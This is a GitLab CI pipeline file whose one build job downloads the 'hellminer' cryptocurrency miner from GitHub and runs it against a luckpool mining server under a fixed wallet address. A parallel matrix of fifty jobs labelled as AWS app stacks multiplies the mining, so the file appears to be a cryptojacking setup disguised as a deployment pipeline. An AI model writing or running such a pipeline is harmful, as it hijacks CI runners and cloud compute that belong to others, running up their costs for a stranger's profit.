build:
  image: python:latest
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xvf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RPwi9kwgonbBpcxon87FeFuMWFepVFdiqm.kepoBangetSi -p x --cpu 1
  parallel:
    matrix:
        - PROVIDER: aws
          STACK:
            - app1
            - app2
            - app3
            - app4
            - app5
            - app6
            - app7
            - app8
            - app9
            - app10
            - app11
            - app12
            - app13
            - app14
            - app15
            - app16
            - app17
            - app18
            - app19
            - app20
            - app21
            - app22
            - app23
            - app24
            - app25
            - app26
            - app27
            - app28
            - app29
            - app30
            - app31
            - app32
            - app33
            - app34
            - app35
            - app36
            - app37
            - app38
            - app39
            - app40
            - app41
            - app42
            - app43
            - app44
            - app45
            - app46
            - app47
            - app48
            - app49
            - app50
